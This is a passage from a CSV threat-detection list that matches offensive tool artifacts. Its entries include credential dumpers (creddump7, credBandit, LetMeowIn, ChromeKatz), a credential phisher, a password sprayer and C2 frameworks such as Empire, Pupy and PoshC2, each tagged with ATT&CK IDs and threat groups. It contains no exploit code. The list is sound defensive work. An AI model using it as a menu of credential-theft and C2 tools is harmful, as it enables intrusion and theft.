- LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39023" "*CreateTokenClient.exe *",".{0,1000}CreateTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39024" "*CreateTokenDrv_x64.sys*",".{0,1000}CreateTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","39025" "*Create-WinLogonProcess*",".{0,1000}Create\-WinLogonProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39026" "*create-workspace.py -E docker -P*/pupyws*",".{0,1000}create\-workspace\.py\s\-E\sdocker\s\-P.{0,1000}\/pupyws.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - 
T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39027" "*Creating a TGT ticket for the user*",".{0,1000}Creating\sa\sTGT\sticket\sfor\sthe\suser.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","39028" "*Creating DigitalOcean OVPN Proxy tab*",".{0,1000}Creating\sDigitalOcean\sOVPN\sProxy\stab.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","39029" "*Creating offline copies of the LSASS process to perform memory dumps on*",".{0,1000}Creating\soffline\scopies\sof\sthe\sLSASS\sprocess\sto\sperform\smemory\sdumps\son.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","39030" "*credBandit * 
output*",".{0,1000}credBandit\s.{0,1000}\soutput.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","0","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39032" "*credBandit.*",".{0,1000}credBandit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 
syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39033" "*credBanditx64*",".{0,1000}credBanditx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","39034" "*creddump.py*",".{0,1000}creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - 
T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","39035" "*creddump7 -*",".{0,1000}creddump7\s\-.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39036" "*creddump7.exe*",".{0,1000}creddump7\.exe.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39037" "*creddump7.win32.*",".{0,1000}creddump7\.win32\..{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","39038" "*Credential Guard bypass might fail if RunAsPPL is enabled*",".{0,1000}Credential\sGuard\sbypass\smight\sfail\sif\sRunAsPPL\sis\senabled.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","39039" "*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*",".{0,1000}CredentialAccess_CredentialDumping_BrowserDataCSharp\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39040" "*CredentialAccess_CredentialDumping_KiwiOnLocal.py*",".{0,1000}CredentialAccess_CredentialDumping_KiwiOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39041" "*CredentialAccess_CredentialDumping_SunLogin.py*",".{0,1000}CredentialAccess_CredentialDumping_SunLogin\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - 
T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39042" "*CredentialAccess_CredentialDumping_WindowsHashDump.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsHashDump\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39043" "*CredentialAccess_CredentialDumping_WindowsWDigestEnable.py*",".{0,1000}CredentialAccess_CredentialDumping_WindowsWDigestEnable\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39044" "*CredentialAccess_CredentialInFiles_BrowserData.py*",".{0,1000}CredentialAccess_CredentialInFiles_BrowserData\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - 
T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39045" "*CredentialAccess_CredentialInFiles_WindowsSoftware.py*",".{0,1000}CredentialAccess_CredentialInFiles_WindowsSoftware\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39046" "*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*",".{0,1000}CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","39047" "*CredentialKatz*",".{0,1000}CredentialKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","39048" "*Credentials Found in 
Configurations!*",".{0,1000}Credentials\sFound\sin\sConfigurations!.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","39049" "*Credentials*hekatomb_*.txt",".{0,1000}Credentials.{0,1000}hekatomb_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39050" "*Credentials/CacheDump.*",".{0,1000}Credentials\/CacheDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","39051" "*Credentials/certsync_*",".{0,1000}Credentials\/certsync_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39052" 
"*Credentials/LSASecrets.*",".{0,1000}Credentials\/LSASecrets\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","39053" "*Credentials/SAMDump*",".{0,1000}Credentials\/SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","39054" "*CredHistView.exe*",".{0,1000}CredHistView\.exe.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","1","N/A","N/A","9","9","N/A","N/A","N/A","N/A","39055" "*credhistview.zip*",".{0,1000}credhistview\.zip.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","1","N/A","N/A","9","9","N/A","N/A","N/A","N/A","39056" "*credmaster.py *",".{0,1000}credmaster\.py\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - 
T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","39057" "*CredMaster\passwords.txt*",".{0,1000}CredMaster\\passwords\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","39058" "*CredPhisher.csproj*",".{0,1000}CredPhisher\.csproj.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","39059" "*CredPhisher.exe*",".{0,1000}CredPhisher\.exe.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","39060" "*credphisher.py*",".{0,1000}credphisher\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","39061" "*cred-popper *",".{0,1000}cred\-popper\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39062" "*CredPrompt/CredPrompt.cna*",".{0,1000}CredPrompt\/CredPrompt\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","39063" "*creds_hunt.exe*",".{0,1000}creds_hunt\.exe.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized 